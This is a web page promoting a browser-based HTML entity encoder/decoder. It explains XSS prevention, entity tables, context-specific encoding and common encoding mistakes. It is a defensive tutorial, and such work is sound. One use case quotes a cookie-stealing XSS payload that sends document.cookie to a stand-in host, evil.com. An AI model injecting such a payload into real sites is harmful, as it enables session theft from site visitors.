
HTML Entity Encoder/Decoder

Convert special characters to HTML entities and back

Last Updated: March 2, 2026
By Viblaa Team

  • Named and numeric entities
  • Real-time conversion
  • Copy to clipboard
  • Bidirectional encoding

You paste user-submitted content into your HTML page. The site breaks. The layout is destroyed. Worse—someone has injected JavaScript that redirects visitors to a malicious site. All because a single <script> tag slipped through unencoded.

HTML entity encoding is the first line of defense against XSS attacks and broken layouts. This tool converts dangerous characters to their safe equivalents instantly—protecting your site and your users.

What is HTML Entity Encoding?

HTML Entity Encoding converts special characters into their HTML entity equivalents. Characters like <, >, &, and quotes have special meaning in HTML—encoding them ensures browsers display them as text rather than interpreting them as code.

Common conversions:

<  →  &lt;
>  →  &gt;
&  →  &amp;
"  →  &quot;
'  →  &#39;

The Security Essential

Every time you display user-generated content, you should encode it. This single practice prevents the majority of XSS (Cross-Site Scripting) attacks—the most common web vulnerability.

Why People Actually Need This Tool

XSS Remains the #1 Web Vulnerability

Despite decades of awareness, Cross-Site Scripting consistently ranks in the OWASP Top 10. Proper encoding is the primary defense, yet many developers still overlook it.

  1. Preventing XSS attacks — Stop malicious scripts from executing in user browsers by encoding all untrusted content.

  2. Displaying code snippets — Show HTML/JavaScript code on web pages without the browser trying to execute it.

  3. Email templates — Ensure special characters render correctly across all email clients.

  4. CMS content — Safely display user-submitted blog posts, comments, and forum content.

  5. API responses — Encode data before sending to prevent injection when rendered by clients.

  6. Documentation — Write technical docs that include code examples without breaking page layout.

  7. RSS/XML feeds — Ensure content is valid XML by encoding reserved characters.

How to Use the HTML Encoder/Decoder

  1. Paste your text — Enter the content containing special characters.

  2. Click Encode or Decode — Transform characters to entities or back to original.

  3. Copy the result — Use the encoded string safely in your HTML.

  4. Choose encoding mode — Select named entities (&lt;) or numeric (&#60;).

| Character | Named Entity | Numeric Entity | When to Encode  |
|-----------|--------------|----------------|-----------------|
| <         | &lt;         | &#60;          | Always          |
| >         | &gt;         | &#62;          | Always          |
| &         | &amp;        | &#38;          | Always          |
| "         | &quot;       | &#34;          | In attributes   |
| '         | &#39;        | &#39;          | In attributes   |
| (nbsp)    | &nbsp;       | &#160;         | Preserve spaces |

Context Matters

HTML encoding protects HTML context only. For JavaScript strings, URLs, or CSS, you need different encoding. Using the wrong encoding in the wrong context still leaves you vulnerable.

Real-World Use Cases

1. The Comment Section Vulnerability

Context: A blog displays user comments directly on the page without encoding.

Problem: A malicious user submits: <script>document.location='http://evil.com/steal?cookie='+document.cookie</script>

Solution: Encoding converts this to harmless text: &lt;script&gt;document.location=...&lt;/script&gt;

Outcome: The attack is neutralized. Visitors see the code as text instead of executing it.

2. The Code Tutorial

Context: A developer writes a tutorial showing how to create HTML buttons.

Problem: Typing <button>Click Me</button> creates an actual button instead of displaying the code.

Solution: Encode to &lt;button&gt;Click Me&lt;/button&gt; so readers see the code example.

Outcome: Tutorial displays properly without unintended rendering.

3. The Email Template Edge Case

Context: An e-commerce platform sends order confirmation emails with product descriptions.

Problem: A product named "Tom & Jerry Kids' Toys" displays as "Tom Jerry Kids Toys" in some email clients.

Solution: Encode as "Tom &amp; Jerry Kids&#39; Toys" for universal compatibility.

Outcome: Product names display correctly across Gmail, Outlook, Apple Mail, and others.

4. The Search Results Display

Context: A search engine displays page titles that include special characters.

Problem: A page titled "C++ > Java: Why Programmers Disagree" breaks the HTML layout.

Solution: Encode the title: "C++ &gt; Java: Why Programmers Disagree"

Outcome: Search results render cleanly without layout issues.

5. The JSON in HTML Attribute

Context: A React app passes JSON data to a custom attribute for client-side JavaScript.

Problem: The attribute data-config with JSON value containing an apostrophe breaks the HTML.

data-config='{"name":"O'Brien"}'

Solution: Encode the apostrophe in the value:

data-config='{"name":"O&#39;Brien"}'

Outcome: Data passes correctly and JavaScript parses it without errors.

6. The Legacy Database Migration

Context: Migrating old database content that was stored without encoding to a modern CMS.

Problem: Thousands of records contain unescaped HTML that could break the new site.

Solution: Batch encode all text fields before import, converting dangerous characters to entities.

Outcome: Clean migration without breaking the new site or creating vulnerabilities.

7. The API Documentation

Context: Auto-generated API docs include example payloads with XML/JSON.

Problem: Example: <user><name>John</name></user> disappears because the browser treats it as HTML.

Solution: Encode examples: &lt;user&gt;&lt;name&gt;John&lt;/name&gt;&lt;/user&gt;

Outcome: Documentation displays all code examples correctly.

Common Mistakes and How to Avoid Them

Double Encoding is Also a Bug

Encoding already-encoded content creates ugly output like &amp;lt; instead of &lt;. Encode once, at the point of output, not multiple times through the pipeline.

Encoding User Input at the Wrong Time

❌ The Mistake
Encoding data when storing in the database, then encoding again when displaying—resulting in double-encoded garbage like `&amp;`.

✅ The Fix
Store data in its original form. Encode only at the moment of output, based on the output context (HTML, JavaScript, URL, etc.).

Using HTML Encoding for JavaScript Context

❌ The Mistake
Placing user data in JavaScript with only HTML encoding: `var name = '<script>';` The browser decodes entities before JavaScript executes.

✅ The Fix
Use JavaScript encoding (JSON.stringify or proper escaping) for data in JavaScript contexts, not HTML encoding.

Forgetting Attribute Context

❌ The Mistake
Encoding angle brackets but forgetting quotes in attributes, causing broken HTML when attribute values contain quote characters.

✅ The Fix
Always encode quotes (" or ') when content appears in HTML attributes.

Relying on Blacklists Instead of Encoding

❌ The Mistake
Trying to strip script tags while allowing other HTML. Attackers always find bypass techniques.

✅ The Fix
Encode everything by default. If you need to allow some HTML, use a whitelist sanitizer library that's actively maintained.

Encoding Content in the Wrong Direction

❌ The Mistake
Decoding user-submitted content that was already safely encoded, reintroducing XSS vulnerabilities.

✅ The Fix
Never decode untrusted content. If you must process it, decode then re-encode, or better—work with encoded form throughout.
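The encoding rules in the entity table above and the double-encoding and attribute-context mistakes listed here, as an added JavaScript example (not the Viblaa tool's own code): a minimal encoder with named and numeric modes, a decoder for named, decimal and hex entities, the data-config attribute from use case 5, and what encoding twice produces. The function names and sample strings are constructed for this illustration.

```javascript
// Added example, not the tool's code: encode the five HTML-significant
// characters from the table, in named or numeric mode.
const NAMED = { '<': '&lt;', '>': '&gt;', '&': '&amp;', '"': '&quot;', "'": '&#39;' };

function encodeHtml(text, mode = 'named') {
  return String(text).replace(/[<>&"']/g, (ch) =>
    mode === 'numeric' ? `&#${ch.charCodeAt(0)};` : NAMED[ch]);
}

// Decode the common named entities plus decimal (&#38;) and hex (&#x26;) forms.
// Unknown names and out-of-range code points are left untouched rather than guessed.
const NAMED_BACK = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'", nbsp: '\u00A0' };

function decodeHtml(text) {
  return String(text).replace(/&(#[xX][0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);/g, (match, body) => {
    if (body[0] === '#') {
      const isHex = body[1] === 'x' || body[1] === 'X';
      const code = isHex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return code <= 0x10FFFF ? String.fromCodePoint(code) : match;
    }
    return NAMED_BACK[body.toLowerCase()] ?? match;
  });
}

// Use case 5: JSON inside a single-quoted attribute. Quotes and the apostrophe
// are both encoded because the value sits in attribute context (see the table).
function dataAttribute(name, value) {
  return `${name}='${encodeHtml(JSON.stringify(value))}'`;
}

// "Store raw, encode at output": storage keeps the original text, and the
// template encodes exactly once when the HTML is produced.
const storedComment = "Tom & Jerry Kids' Toys";   // constructed sample, stored unencoded
function renderComment(raw) {
  return `<p>${encodeHtml(raw)}</p>`;
}

// Encoding an already-encoded string is the double-encoding bug from above:
// '<' -> '&lt;' -> '&amp;lt;', which a browser then displays as the literal text "&lt;".
function doubleEncoded(ch) {
  return encodeHtml(encodeHtml(ch));
}
```

Decoding `&amp;lt;` once yields `&lt;`, not `<`, which is why the fix is to encode a single time at the point of output rather than to decode stored content on the way in.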

Privacy and Data Handling

This HTML Encoder/Decoder operates entirely in your browser. Your content stays private.

  • No text is sent to any server.
  • No data is stored or logged.
  • No account required.
  • Works completely offline.

Whether you're encoding sensitive user data or proprietary code, it never leaves your device.

Conclusion

HTML entity encoding is one of those unglamorous essentials that prevents catastrophic failures. Every unencoded < is a potential XSS attack waiting to happen. Every unencoded & is a broken layout waiting to surprise you.

This tool makes encoding instant and error-free. Whether you're securing a production application, writing documentation, or debugging display issues, get the right encoded output every time.

Security doesn't have to be complicated. Sometimes it's just replacing five characters with their safe equivalents.

Frequently Asked Questions